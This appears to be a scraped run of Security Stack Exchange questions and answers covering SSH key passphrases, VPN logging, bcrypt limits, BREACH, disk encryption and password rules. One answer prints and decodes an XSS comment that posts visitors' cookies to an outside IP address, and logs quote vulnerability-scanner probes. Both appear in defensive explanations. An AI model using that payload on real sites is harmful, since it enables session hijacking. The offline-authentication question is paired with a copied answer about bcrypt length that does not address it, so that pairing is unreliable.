smaller in length." But I'm not sure if this is the right answer, or if there are any other aspects to it that I need to worry about, etc. If this SSH private key is really not practically decryptable, then I intend to protect it with a VERY long passphrase and then forget all about securing the key itself. I, for example, could store it in my Gmail inbox (letting even Gmail team see it), or even upload it on my personal website for my easy retrieval (say, when I'm travelling). Etc. | It is not the length of the passphrase which matters, but its randomness; namely, how much different it could have been. Length makes room for randomness, but does not generate it. Symmetric encryption of SSH private keys is not very well designed; it relies on some old features of OpenSSL, which date from before password hashing was a properly understood problem. See this answer for a detailed analysis. Bottom-line is that attackers will be able to try potential passwords by the billion per second, unless you invest some effort into wrapping your key in a PKCS#8 object with PBKDF2 and enough rounds. If you generate your passphrase as a sequence of letters, each chosen randomly and uniformly, you will get 4.7 bits of entropy per letter (because 26 is approximately equal to 2 4.7 ). To reach a decent protection level (say, 100 bits), you will need 22 letters... If you prefer to generate meaningful words , say among a list of 2048 "common words", then you will get 11 bits per word, and 9 words will get you to 99 bits of entropy. There again, each word must be chosen randomly, uniformly, and independently of the other words. With PKCS#8 + PBKDF2 and one million rounds (OpenSSL would need some coaxing to produce that), you gain 20 bits (because 2 20 is approximately equal to one million). Remember that remembering , indeed, can be tricky. You will remember a very long passphrase, but only if you type it often enough. If you don't, then forgetfulness is almost guaranteed. I suggest that you print your very long passphrase and store it in a bank safe (print with a laser printer, not an inkjet printer: ink from the latter can fade away rather quick). Or, simpler, cut the middle man and print the key itself on the paper which you put in the bank safe. (*) Note: printing systems may keep a cached copy of past printing jobs. Removing all traces can be tricky. You could use a "manual printing" process with a pen and your hand... for really long-time storage, consider engraving on stone or some rust-resistant metal. | {
"source": [
"https://security.stackexchange.com/questions/39676",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9375/"
]
} |
39,729 | I've noticed a few requests like this to a Rails application I am maintaining: GET http://mydomain.com/?f=4&t=252751+++++++++++++++++++++++++++++++++++++++++Result:+%E8%F1%EF%EE%EB%FC%E7%F3%E5%EC+%EF%F0%EE%EA%F1%E8+85.17.122.209:6188;+%ED%E5+%ED%E0%F8%EB%EE%F1%FC+%F4%EE%F0%EC%FB+%E4%EB%FF+%EE%F2%EF%F0%E0%E2%EA%E8;+Result:+GET-%F2%E0%E9%EC%E0%F3%F2%EE%E2+1;+%ED%E5+%ED%E0%F8%EB%EE%F1%FC+%F4%EE%F0%EC%FB+%E4%EB%FF+%EE%F2%EF%F0%E0%E2%EA%E8; It looks like an attempt to exploit some vulnerability to me, but I can't make sense out of what it's supposed to do, and it's kind of hard to google. Any insights would be appreciated. | The request parameter is encoded with Windows Codepage 1251 and contains an apparently harmless error message in Russian: используем прокси 85.17.122.209:6188; не нашлось формы для отправки; Result: GET-таймаутов 1; не нашлось формы для отправки; Roughly translated to English, the message reads: using proxy 85.17.122.209:6188; there were no forms to be sent; Result: GET-timeout 1; there were no forms to be sent; It surely does not look as if someone is trying to hack you. I would rather assume that something is trying to report an error and due to misconfiguration is calling your server instead of whatever is supposed to track or handle the problem. | {
"source": [
"https://security.stackexchange.com/questions/39729",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/16358/"
]
} |
39,788 | I know there are 2 services of VPN (free and paid). Normally, free VPNs need money from somewhere and sometimes they can sell your information to any agency that needs it. Now, if we are talking about a paid VPN where they use encryption and don't keep any logs or information about the user, IP addresses, or what you're doing, how can a hacker be traceable? Then, the best hackers who have been caught must have been a free VPN, because they were too cheap to pay 7-10$/month or I'm missing something. An excerpt from the FAQs of one of these VPN services. They have it in the privacy policy. | Update/Note: This is not to discourage VPN usage. I personally use one of the providers mentioned below, and I'm very happy with it. The important point is not to have an illusion of being 100% protected by the VPN provider. If you do something bad enough that state actors are after you, the VPN provider aren't going to risk themselves for you. If those coming after you are motivated enough, they'll exert all possible legal (and not so legal) powers they have. Downloading torrents or posting on anarchist forums is probably not motivating enough, but death threats to up-high politicians on the other hand... If there's one thing to take from this post is this: Use common sense. I've researched this subject for more than 3 years*: Looking for VPN providers, reading through their Privacy Policy and Legal pages, contacting them, contacting their ISPs when possible, and I've concluded the following: I was able to find zero reputable/trustworthy and publicly-available (free or paid) VPN service provider that: Actually doesn't keep usage logs. Actually doesn't respond with your personal information when presented with a subpoena . I'm not exaggerating, absolutely none, zero, nada, nula, nulla, ciphr, cifra. * Obviously not a dedicated research for 3 years Update: Regarding "super awesome Swedish VPN service providers". Swedish service provider obey the 'Electronic Communications Act 2003 389' . Sections 5, 6, and 7 under "Processing of traffic data" completely protect your privacy, but go a little further and read section 8 The provisions of Sections 5 to 7 do not apply When an authority or a court needs access to such data as referred to in Section 5 to resolve disputes. For electronic messages that are conveyed or have been dispatched or ordered to or from a particular address in an electronic
communications network that is subject to a decision on secret
wire-tapping or secret tele-surveillance . To the extent data as referred to in Section 5 is necessary to prevent and expose unauthorised use of an electronic communications network or an electronic communications service. In case the authorities order secret wire-tapping, the service provider shall not disclose information about it Section 19 An operation shall be conducted so a decision on secret
wire-tapping and secret tele-surveillance can be implemented and so
that the implementation is not disclosed . Update 2: Regarding other highly recommended super anonymous VPN services (I'll go over only the top two) BTGuard: You only need to take one look at the Privacy Policy to know that there's something shady going on. Before or at the time of collecting personal information , we will identify the purposes for which information is being collected. We will collect and use of personal information solely with the objective of fulfilling those purposes specified by us and for other
compatible purposes, unless we obtain the consent of the individual
concerned or as required by law . We will only retain personal information as long as necessary for the fulfillment of those purposes . We will collect personal information by lawful and fair means and, where appropriate, with the knowledge or consent of the individual
concerned . You can clearly see the intentionally vague language: "fulfilling those purposes specified by us", what are those purposes specified by them? Nobody knows. They even clearly say that they'll collect personal information when required by the law. In the last point they even state that they even don't have to inform you about the collection of your personal information unless it's "appropriate". PrivateInternetAccess: This is probably one of the easiest legal language in the business. You agree to comply with all applicable laws and regulations in
connection with use of this service. You must also agree that you nor
any other user that you have provided access to will not engage in any
of the following activities: Uploading, possessing, receiving, transporting, or distributing any copyrighted, trademark, or patented content which you do not own or
lack written consent or a license from the copyright owner. Accessing data, systems or networks including attempts to probe scan or test for vulnerabilities of a system or network or to breach
security or authentication measures without written consent from the
owner of the system or network. Accessing the service to violate any laws at the local, state and federal level in the United States of America or the country/territory
in which you reside. If you break any of their conduct conditions (mentioned above) Failure to comply with the present Terms of Service constitutes a
material breach of the Agreement, and may result in one or more of
these following actions: Issuance of a warning; Immediate, temporary, or permanent revocation of access to Privateinternetaccess.com with no refund; Legal actions against you for reimbursement of any costs incurred via indemnity resulting from a breach; Independent legal action by Privateinternetaccess.com as a result of a breach; or Disclosure of such information to law enforcement authorities as deemed reasonably necessary. | {
"source": [
"https://security.stackexchange.com/questions/39788",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26558/"
]
} |
39,849 | I was messing around with bcrypt today and noticed something: hashpw('testtdsdddddddddddddddddddddddddddddddddddddddddddddddsddddddddddddddddd', salt)
Output: '$2a$15$jQYbLa5m0PIo7eZ6MGCzr.BC17WEAHyTHiwv8oLvyYcg3guP5Zc1y'
hashpw('testtdsdddddddddddddddddddddddddddddddddddddddddddddddsdddddddddddddddddd', salt)
Output: '$2a$15$jQYbLa5m0PIo7eZ6MGCzr.BC17WEAHyTHiwv8oLvyYcg3guP5Zc1y' Does bcrypt have a maximum password length? | Yes, bcrypt has a maximum password length. The original article contains this: the key argument is a secret encryption key, which can be a user-chosen password of up to 56 bytes (including a terminating zero byte when the key is an ASCII string). So one could infer a maximum input password length of 55 characters (not counting the terminating zero). ASCII characters, mind you: a generic Unicode character, when encoded in UTF-8, can use up to four bytes; and the visual concept of a glyph may consist of an unbounded number of Unicode characters. You will save a lot of worries if you restrict your passwords to plain ASCII. However, there is a considerable amount of confusion on the actual limit. Some people believe that the "56 bytes" limit includes a 4-byte salt, leading to a lower limit of 51 characters. Other people point out that the algorithm, internally, manages things as 18 32-bit words, for a total of 72 bytes, so you could go to 71 characters (or even 72 if you don't manage strings with a terminating zero). Actual implementations will have a limit which depends on what the implementer believed and enforced in all of the above. All decent implementations will allow you at least 50 characters. Beyond that, support is not guaranteed. If you need to support passwords longer than 50 characters, you can add a preliminary hashing step, as discussed in this question (but, of course, this means that you no longer compute "the" bcrypt, but a local variant, so interoperability goes down the drain). Edit: it has been pointed out to me that although, from a cryptographer's point of view, the article is the ultimate reference, this is not necessarily how the designers thought about it. The "original" implementation could process up to 72 bytes. Depending on your stance on formalism, you may claim that the implementation is right and the article is wrong. Anyway, such is the current state of things that my advice remains valid: if you keep under 50 characters, you will be fine everywhere. (Of course it would have been better if the algorithm did not have a length limitation in the first place.) | {
"source": [
"https://security.stackexchange.com/questions/39849",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/28936/"
]
} |
39,857 | I'm currently thinking about a web-app that can go offline (after being online) and still be able to provide authentication to the user securely.
(For example, in a multiuser environment, it's quite essential to prevent other users' access.) Right now, I was considering a password-hash authentication with some salt, and just saw this SO question: https://stackoverflow.com/questions/7879641/user-authentication-in-offline-web-apps But since this is a web environment, I have to assume that others have access to the source code of the app, and thus the salt itself is leaked.
(Also, the attacker might use the hash itself to bruteforce the password itself.) So...to summarize, my 2 questions are: Is salting effective even when it's leaked?
I'm guessing no to the question, since it takes O(X^(m+n)) to bruteforce the unknown...
and it gets worse when the attacker uses the password hash to bruteforce the passwwd.. Are there any effective (secure) ways to authenticate the user? Any good way to generate a DES key for encrypting the user's data
(and provide a way for the server to distinguish between tampered data and real one?) | Yes, bcrypt has a maximum password length. The original article contains this: the key argument is a secret encryption key, which can be a user-chosen password of up to 56 bytes (including a terminating zero byte when the key is an ASCII string). So one could infer a maximum input password length of 55 characters (not counting the terminating zero). ASCII characters, mind you: a generic Unicode character, when encoded in UTF-8, can use up to four bytes; and the visual concept of a glyph may consist of an unbounded number of Unicode characters. You will save a lot of worries if you restrict your passwords to plain ASCII. However, there is a considerable amount of confusion on the actual limit. Some people believe that the "56 bytes" limit includes a 4-byte salt, leading to a lower limit of 51 characters. Other people point out that the algorithm, internally, manages things as 18 32-bit words, for a total of 72 bytes, so you could go to 71 characters (or even 72 if you don't manage strings with a terminating zero). Actual implementations will have a limit which depends on what the implementer believed and enforced in all of the above. All decent implementations will allow you at least 50 characters. Beyond that, support is not guaranteed. If you need to support passwords longer than 50 characters, you can add a preliminary hashing step, as discussed in this question (but, of course, this means that you no longer compute "the" bcrypt, but a local variant, so interoperability goes down the drain). Edit: it has been pointed out to me that although, from a cryptographer's point of view, the article is the ultimate reference, this is not necessarily how the designers thought about it. The "original" implementation could process up to 72 bytes. Depending on your stance on formalism, you may claim that the implementation is right and the article is wrong. Anyway, such is the current state of things that my advice remains valid: if you keep under 50 characters, you will be fine everywhere. (Of course it would have been better if the algorithm did not have a length limitation in the first place.) | {
"source": [
"https://security.stackexchange.com/questions/39857",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/28979/"
]
} |
39,872 | Recently a provider (of SIP trunking services) I subscribe to sent me a strange email. It claimed that someone in another country attempted to reset the password to my account and was unsuccessful in answering my security question. The provider's response to this event was to reset my password. Dear Customer, We received a request to reset the password for the account ‘myusername’
from the IP address 41.174.96.79 but the security question entered was
invalid. As a security precaution we have set your accounts password to:
roRy1391 Once you have logged in you will be prompted to change your password
immediately. (The email turned out to be real, and I was able to login and change my password successfully.) It seems to me that the appropriate response to such an event is for the provider to do nothing. After all, what if this attacker had already gained access to my email account? Then he would have received this email, and gotten access to my account anyway. However, there is a possibly mitigating factor. This provider always requires answering the security question whenever logging in from a new IP address. This also, in theory, would have stopped this attack if the attacker had gotten access to this password reset email. Was this an appropriate action on the provider's part? If not, what should they have done instead, and what should I say when I yell at them? | This is an absolute breach of security. Even if their policy was somehow sound, sending the password in plaintext to you in an email means that the reset is useless, and as you said, if the attacker had access to your email the security questions wouldn't do squat. They should have done nothing as the security question answered was invalid. The best thing to do, IMHO, is to go a step further and block the user from answering questions for a defined period. Notifying you is a proper step, but changing the password just makes it useless. I'd ask them a simple question: "if you're going to send me (or someone pretending to be me with access to my email) a password if I/someone else guess the security question wrong, what's the point of security questions?" | {
"source": [
"https://security.stackexchange.com/questions/39872",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11291/"
]
} |
39,925 | Following on from CRIME, now we have BREACH to be presented at Black Hat in Las Vegas Thursday (today). From the linked article, it suggests that this attack against compression will not be as simple to turn off as was done to deter CRIME. What can be done to mitigate this latest assault against HTTP? EDIT: The presenters of BREACH have put up a website with further details. The listed mitigations are: Disabling HTTP compression Separating secrets from user input Randomizing secrets per request Masking secrets Protecting vulnerable pages with CSRF Length hiding Rate-limiting requests (note - also edited title and original question to clarify this attack is against HTTP which may be encrypted, not HTTPS specifically) | Though the article is not full of details, we can infer a few things: Attack uses compression with the same general principle as CRIME : the attacker can make a target system compress a sequence of characters which includes both a secret value (that the attacker tries to guess) and some characters that the attacker can choose. That's a chosen plaintext attack . The compressed length will depend on whether the attacker's string "looks like" the secret or not. The compressed length leaks through SSL encryption, because encryption hides contents , not length . The article specifically speaks of "any secret that's [...] located in the body ". So we are talking about HTTP-level compression, not SSL-level compression. HTTP compression applies on the request body only, not the header. So secrets in the header , in particular cookie values, are safe from that one. Since there are "probe requests", then the attack requires some malicious code in the client browser; the attacker must also observe the encrypted bytes on the network, and coordinate both elements. This is the same setup as for CRIME and BEAST. It is unclear (from the article alone, which is all I have right now to discuss on) whether the compressed body is one from the client or from the server . "Probe request" are certainly sent by the client (on behalf of the attacker) but responses from the server may include part of that which is sent in the request, so the "chosen plaintext attack" can work both ways. In any case, "BREACH" looks like an attack methodology which needs to be adapted to the specific case of a target site. In that sense, it is not new at all; it was already "well-known" that compression leaks information and there was no reason to believe that HTTP-level compression was magically immune. Heck, it was discussed right here last year. It is a good thing, however, that some people go the extra mile to show working demonstrations because otherwise flaws would never be fixed. For instance, padding oracle attacks against CBC had been described and even prototyped in 2002, but it took an actual demo against ASP in 2010 to convince Microsoft that the danger was real. Similarly for BEAST in 2011 (the need for unpredictable IV for CBC mode was known since 2002 as well) and CRIME in 2012; BREACH is more "CRIME II": one more layer of pedagogy to strike down the unbelievers. Unfortunately, a lot of people will get it wrong and believe it to be an attack against SSL, which it is not. It has nothing to do with SSL, really. It is an attack which forces an information leak through a low-bandwidth data channel, the data length , that SSL has never covered, and never claimed to cover. The one-line executive summary is that thou shalt not compress . | {
"source": [
"https://security.stackexchange.com/questions/39925",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26109/"
]
} |
40,050 | Is it better to create a separate SSH key for each host and user or just using the id_rsa key for all hosts to authenticate? Could one id_rsa be malpractice for the privacy/anonymity policies? having one ssh-key for all hosts: ~/.ssh/id_rsa
~/.ssh/id_rsa.pub in comparison to separate ssh-keys: ~/.ssh/user1_host1
~/.ssh/user1_host1.pub
~/.ssh/user2_host1
~/.ssh/user2_host1.pub
~/.ssh/user3_host2
~/.ssh/user3_host2.pub
~/.ssh/user4_host3
~/.ssh/user4_host3.pub
... etc. | A private key corresponds to a single "identity" for a given user, whatever that means to you. If, to you, an "identity" is a single person, or a single person on a single machine, or perhaps a single instance of an application running on a single machine. The level of granularity is up to you. As far as security is concerned, you don't compromise your key in any way [1] by using it to log in on a machine (as you would by using a password), so having separate keys for separate destinations doesn't make you any more safe from an authentication/security perspective. Though having the same key authorized for multiple machines does prove that the same key-holder has access to both machines from a forensic perspective. Typically that's not an issue, but it's worth pointing out. Also, the more places a single key is authorized, the more valuable that key becomes. If that key gets compromised, more targets are put at risk. Also, the more places the private key is stored (say, your work computer, your laptop, and your backup storage, for example), the more places there are for an attacker to go to grab a copy. So that's worth considering as well. As for universally-applicable guidelines on how to run your security: there are none. The more additional security you add, the more convenience you give up. The one piece of advice I can give categorically is this: keep your private key encrypted. The added security there is pretty significant. [1] : There's one important way in which authorizing the same SSH key in different security contexts could be a problem, and that issue has to do with agent forwarding . The constraints and caveats around safely using agent forwarding is outside the scope of this question though. | {
"source": [
"https://security.stackexchange.com/questions/40050",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/21808/"
]
} |
40,077 | Is it worth to obfuscate a java web app source code so that the web host cannot make wrong use of the code or even steal your business? If so, how should this be dealt with? How should we obfuscate? We are a new start up launching a product in market. How can we protect our product/web application's source code? | A malicious hosting provider can do a lot more than simply steal your code. They can modify it to introduce backdoors, they can steal your clients' data, and ruin your whole business. Trust must exist between you and the host. About the source code. If the attacker is trying to gain access to your source code, they will gain access to your source code, obfuscated or not, compiled or interpreted. There is a value in obfuscating your code, in that you'll probably make it just a liiiiitle bit more difficult to be obtained by the occasional opportunistic attacker. But if your host is out to get you, they'll get you. The solution? The law. Sign a contract with them and agree on some form of NDA . | {
"source": [
"https://security.stackexchange.com/questions/40077",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10305/"
]
} |
40,208 | I'm looking for recommended options for cryptsetup to create fully encrypted SSD ( SanDisk SSD U100 128GB ), which achive: Timing O_DIRECT disk reads: 1476 MB in 3.00 seconds = 491.81 MB/sec
Timing buffered disk reads: 1420 MB in 3.00 seconds = 473.01 MB/sec My benchmark shows me best cipher: # cryptsetup benchmark
# Tests are approximate using memory only (no storage IO).
PBKDF2-sha1 103696 iterations per second
PBKDF2-sha256 59904 iterations per second
PBKDF2-sha512 38235 iterations per second
PBKDF2-ripemd160 85111 iterations per second
PBKDF2-whirlpool 47216 iterations per second
# Algorithm | Key | Encryption | Decryption
aes-cbc 128b 133.2 MiB/s 432.0 MiB/s
serpent-cbc 128b 18.1 MiB/s 67.3 MiB/s
twofish-cbc 128b 39.3 MiB/s 73.0 MiB/s
aes-cbc 256b 99.6 MiB/s 337.7 MiB/s
serpent-cbc 256b 18.1 MiB/s 66.9 MiB/s
twofish-cbc 256b 39.4 MiB/s 72.6 MiB/s
aes-xts 256b 376.6 MiB/s 375.0 MiB/s
serpent-xts 256b 69.0 MiB/s 66.5 MiB/s
twofish-xts 256b 71.1 MiB/s 72.2 MiB/s
aes-xts 512b 297.0 MiB/s 300.1 MiB/s
serpent-xts 512b 69.6 MiB/s 66.6 MiB/s
twofish-xts 512b 71.9 MiB/s 72.7 MiB/s But perhaps, you could suggest some options, that would increase my performance and security. My CPU is: Intel(R) Core(TM) i7-2677M CPU @ 1.80GHz and it supports AES-NI ( aes cpu flag). Thank you | You might want to use PBKDF2 with SHA-512. This step is for converting your password into an encryption key (more or less directly). This is inherently open to offline dictionary attacks , and relates to the password hashing problematic. For that, you want to maximize the effort of the attacker by choosing an algorithm and iteration count which will make the task hardest for the attacker while keeping it tolerable for you; "tolerable" here depends on your patience, when you type the password at boot time. Attackers will want to use some GPU and/or FPGA to speed up their attack, while you use a normal PC. Nowadays, normal PC are at ease with 64-bit arithmetic operations, and run SHA-512 about as fast as SHA-256; however, GPU much prefer 32-bit operations, and mapping them on FPGA is also easier than 64-bit operations. Therefore, by using SHA-512 instead of SHA-256, you give less an advantage to the attacker. Hence my recommendation: on modern hardware, for password hashing, prefer SHA-512 over SHA-256. Remember to adjust the "iteration count" so that the time taken to process your password is at the threshold of the bearable: higher iteration counts mean longer processing time, but are proportionally better for security. For actual encryption, you will want XTS , which has been designed to support disk encryption efficiently. This indeed shows in the benchmarks; this is for a SSD and you do not want the encryption to be much slower than the underlying hardware. Note that XTS splits the key into two halves, only one of which being used for the actual encryption. In other words, " aes-xts " with a 256-bit key actually uses 128 bits for the AES part. And that's good enough . There is no rational need for going to 256-bit keys -- i.e. 512-bit in the context of " aes-xts ". 256-bit keys for AES imply some CPU overhead, which the benchmarks duly observe (300 MB/s vs 375 MB/s). With a SSD under the hood, you really want a fast encryption system, so do that. | {
"source": [
"https://security.stackexchange.com/questions/40208",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29209/"
]
} |
40,227 | Today I was checking comments on my blog and I found a strange comment, here is the exact text <script>var _0x352a=["\x31\x31\x34\x2E\x34\x35\x2E\x32\x31\x37\x2E\x33\x33\x2F\x76\x6C\x6B\x2E\x70\x68\x70","\x63\x6F\x6F\x6B\x69\x65","\x68\x74\x6D\x6C","\x70\x6F\x73\x74"];$[_0x352a[3]](_0x352a[0],{cookie:document[_0x352a[1]]},function (){} ,_0x352a[2]);</script> What does it mean? Is it a mistake? Note that I had big XSS issue last summer but a security expert fixed it. Today I contacted him and he said it's okay and that I should not worry. But I am worried. | First of all, your security guy is likely right. It doesn't look like you have anything to worry about because from your description of the issue and the guy's response I think that the script tags were properly encoded. Think of it as a neutralized weapon. It's there, yes, but it cannot do any damage. Running that code through a deobfuscator gives us $["post"]("114.45.217.33/vlk.php",{cookie:document["cookie"]},function(){},"html") Now we just "beatify" the code to make it more readable $["post"]("114.45.217.33/vlk.php", {
cookie: document["cookie"]
}, function () {}, "html") As you can see, the attacker was hoping that your site is vulnerable to XSS to exploit it and steal your visitor's cookies including yours. He's also assuming/hoping that you're using jQuery, and it's actually a very reasonable assumption these days. If they manage to steal your cookies, then they'll get the session identifier and potentially log in as one of your users or even your administrator account. I'm not sure why he left the callback function there or the response type, though. Removing them would have made the payload even smaller. Running that IP address through a blacklist checking tool shows us that the host there is likely to be compromised. This sure looks like a random attack by a bot trying to insert that code into random blogs and sites in the hopes that one of them would be vulnerable. | {
"source": [
"https://security.stackexchange.com/questions/40227",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26985/"
]
} |
40,291 | I have a Linode VPS running Nginx, which currently serves only static content. Once I was looking at the log and noticed some strange requests: XXX.193.171.202 - - [07/Aug/2013:14:04:36 +0400] "GET /user/soapCaller.bs HTTP/1.1" 404 142 "-" "Morfeus Fucking Scanner"
XXX.125.148.79 - - [07/Aug/2013:20:53:35 +0400] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 142 "-" "ZmEu"
XXX.125.148.79 - - [07/Aug/2013:20:53:35 +0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 142 "-" "ZmEu"
XXX.125.148.79 - - [07/Aug/2013:20:53:35 +0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 142 "-" "ZmEu"
XXX.125.148.79 - - [07/Aug/2013:20:53:35 +0400] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 142 "-" "ZmEu"
XXX.125.148.79 - - [07/Aug/2013:20:53:35 +0400] "GET /pma/scripts/setup.php HTTP/1.1" 404 142 "-" "ZmEu"
XXX.125.148.79 - - [07/Aug/2013:20:53:35 +0400] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 142 "-" "ZmEu"
XXX.221.207.157 - - [07/Aug/2013:22:04:20 +0400] "\x80w\x01\x03\x01\x00N\x00\x00\x00 \x00\x009\x00\x008\x00\x005\x00\x00\x16\x00\x00\x13\x00\x00" 400 172 "-" "-"
XXX.221.207.157 - admin [07/Aug/2013:22:04:21 +0400] "GET /HNAP1/ HTTP/1.1" 404 142 "http://212.71.249.8/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/xxx.x (KHTML like Gecko) Safari/12x.x" Should I worry about somebody trying to hack my server in this case? | It appears that your server is the target of an automated attack involving the ZmEu scanner . That first request appears to be from another automated attack involving the Morfeus Scanner . That last request appears to be an attempt to exploit vulnerabilities in the Home Network Administration Protocol (HNAP) implementations of D-Link routers. More information about the attack can be found here . From a cusory glance at the request it's making, I'd say you have nothing to worry about if you aren't running phpmyadmin on your systems. Such attacks are commonplace for servers connected to the internet and the scans are getting 404's indicating that your server does not have what they are looking for. | {
"source": [
"https://security.stackexchange.com/questions/40291",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/19689/"
]
} |
40,310 | I'm generating a token to be used when clicking on the link in a verification e-mail. I plan on using uniqid() but the output will be predictable allowing an attacker to bypass the confirmation e-mails. My solution is to hash it. But that's still not enough because if the hash I'm using is discovered then it will still be predictable. The solution is to salt it. That I'm not sure how to do because if I use a function to give variable salt (e.g. in pseudocode hash(uniqid()+time()) ) then isn't the uniqueness of the hash no longer guaranteed? Should I use a constant hash and that would be good enough (e.g. hash(uniqid()+asd741) ) I think all answers miss an important point. It needs to be unique. What if openssl_random_pseudo_bytes() procduces the same number twice? Then one user wouldn't be able to activate his account. Is people's counter argument that it's unlikely for it to produce the same number twice? That's why I was considering uniqid() because it's output is unique. I guess I could use both and append them together. | You want unguessable randomness. Then, use unguessable randomness. Use openssl_random_pseudo_bytes() which will plug into the local cryptographically strong PRNG . Don't use rand() or mt_rand() , since these are predictable ( mt_rand() is statistically good but it does not hold against sentient attackers). Don't compromise, use a good PRNG. Don't try to make something yourself by throwing in hash function and the like; only sorrow lies at the end of this path. Generate 16 bytes, then encode them into a string if you need a string. bin2hex() encodes in hexadecimal; 16 bytes become 32 characters. base64_encode() encodes in Base64; 16 bytes become 24 characters (the last two of which being '=' signs). 16 bytes is 128 bits, that's the "safe value" making collisions so utterly improbable that you don't need to worry about them. Don't go below that unless you have a good reason (and, even then, don't go below 16 anyway). | {
"source": [
"https://security.stackexchange.com/questions/40310",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10714/"
]
} |
40,441 | Naturally I feel that I have to ask this question, since it's a built-in feature in Windows. Let's say someone has physical access to my PC, is there an easy way for them to access a BitLocker protected drive without physically tampering with the PC (such as hardware keyloggers)? | There is currently only one cold boot attack I know of that works against bitlocker. However it would need to be executed seconds after the computer has been turned off (it can be extended to minutes if the DRAM modules are cooled down significantly) but due to the timeframe of execution it's rather implausible. Bitlocker is secure as long as your machine is completely turned off when you store it (hibernate is also ok, but sleep needs to be disabled). | {
"source": [
"https://security.stackexchange.com/questions/40441",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29407/"
]
} |
40,512 | After a user registers an e-mail is sent to them with a link they must click on to activate the account. I know other sites have a limit on the amount of time the user has to click the link, else the link expires. Come to think of it why is this necessary? Is it to prevent an attacker from creating accounts to which he does not own the registered e-mail because he could generate an arbitrarily large amount of accounts and have unlimited time to guess activation links to them? If it is necessary, how long should the user have to click on the link? | Most websites allow an e-mail address to be used only for one account which makes sense because most of the time, users only need one account. Therefore, a unique e-mail address is required. That being said, once the user has registered but only needs to confirm his e-mail address, you want to insert in the database the e-mail address of the user to not allow someone else or the very same person to register again. If you do not handle e-mail confirmation expiration, someone could register with someone else's e-mail address and never confirm it which would lock the e-mail of the legitimate user if he ever wants to register to your website. If the user hasn't confirmed his e-mail address in the given length of time, you want to make it available again, in case it wasn't really his address or if he wants to register again later on. Consider the case where a user entered the wrong e-mail address by a mistake. Now for the right length of time, I'd say that it depends on the type of website it is. I don't see the point of allowing more than a few hours because the user should be able to quickly access his e-mail address if he was able to register to your website. Consider the case where a user forgot his e-mail address password and can't access it. He might need to go through some steps to get his password back which could take a while. However, would it really do harm if he has to register again? Once again, it depends on the website. | {
"source": [
"https://security.stackexchange.com/questions/40512",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10714/"
]
} |
40,564 | /////////////////////////////// Updated Post Below //////////////////////////// This question has received a lot of hits, more than I ever thought it would have on such a basic topic. So, I thought I would update people on what I am doing. Also I keep reading in the comments that I am storing passwords as plain text. Just to clarify I am not. My updated validation function : public function is_password($str) {
if (strlen($str) < 10) { // Less then 10
$this -> set_message('is_password', 'Password must include at least one number, one letter, one capital letter , one symbol and be between 10 and 100 characters long.');
return FALSE;
} elseif (strlen($str) > 100) { // Greater then 100
$this -> set_message('is_password', 'Password must include at least one number, one letter, one capital letter , one symbol and be between 10 and 100 characters long.');
return FALSE;
} elseif (!preg_match("#[0-9]+#", $str)) { // At least 1 number
$this -> set_message('is_password', 'Password must include at least one number, one letter, one capital letter , one symbol and be between 10 and 100 characters long.');
return FALSE;
} elseif (!preg_match("#[a-z]+#", $str)) { // At least 1 letter
$this -> set_message('is_password', 'Password must include at least one number, one letter, one capital letter , one symbol and be between 10 and 100 characters long.');
return FALSE;
} elseif (!preg_match("#[A-Z]+#", $str)) { // At least 1 capital
$this -> set_message('is_password', 'Password must include at least one number, one letter, one capital letter , one symbol and be between 10 and 100 characters long.');
return FALSE;
} elseif (!preg_match("#\W+#", $str)) { // At least 1 symbol
$this -> set_message('is_password', 'Password must include at least one number, one letter, one capital letter , one symbol and be between 10 and 100 characters long.');
return FALSE;
} else {
return TRUE; // No errors
}
} Each time it returns FALSE , I always tell them the entire password need. Just to answer some of the questions as to why it is so long : Why not so long? People at my job that I talk to use sentences. Very long ones at that. How am I hashing my passwords? / Why use 100 characters? -> just use better hashing algorithm For PHP, I am using the best there is for this language. I am using this library which is the PHP 5.5 equivalence of the new password hashing API created by Anthony Ferrara. My reasoning for this hashing use is simple, very high demand on the CPU (if you ever test it out on a Linux/Windows box CPU usage is at 100%). Also, the algorithm is very scalable due to the cost factor the higher the cost the more grueling the task is for the CPU to log a person in. Last I "Tested" , I put the cost to 24. An entire hour passed for me to try and login and I got a PHP time out error before I even got past the login screen (this was a foolish cost factor). A study done by Jeremi Gosney (THIS IS THE PDF DOWNLOAD OF THE REPORT) which tested the strength of this function compared to other more popular ones (yes, more popular) concluded that even with 25 - GPUs, while using bcrypt at a cost of 5, password hashing is the last of your concerns. I use a cost of 17... My function if any one is interested (The parts that pertain to this subject at least) : public function create_user($value) {
$this -> CI = get_instance();
$this -> CI -> load -> library('bcrypt');
foreach ($value as $k => $v) {// add PDO place holder to the keys
$vals[":$k"] = $v;
}
$vals[":password"] = $this -> CI -> bcrypt -> password_hash($vals[":password"], PASSWORD_BCRYPT, array("cost" => 17)); // Take old $vals[":password"] and run it through bcrypt to come up with the new $vals[":password"] Hopefully this question helps others out there. /////////////////////////////// Original Post Below //////////////////////////// I'm currently working on a new project, and an issue struck me. Is it it safe to disclose your password requirements? If so, why is it safe? I have a function that does validation on a password and each step shows the user why validation does not work. Here is my function: public function is_password($str) {
if (strlen($str) < 10) {
$this -> set_message('is_password', 'Password too short.');
return FALSE;
} elseif (strlen($str) > 100) {
